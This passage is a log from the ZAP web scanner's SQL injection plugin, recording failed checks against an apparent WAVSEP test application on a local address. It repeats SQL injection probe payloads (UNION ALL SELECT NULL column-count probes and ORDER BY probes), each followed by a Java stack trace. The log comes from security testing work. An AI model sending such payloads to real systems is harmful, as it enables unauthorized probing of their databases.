org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681457 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681457 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681457 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681458 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681459 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681459 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681460 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681461 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681461 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681462 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 2795#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// ORDER BY 2795# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681462 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681464 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681464 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 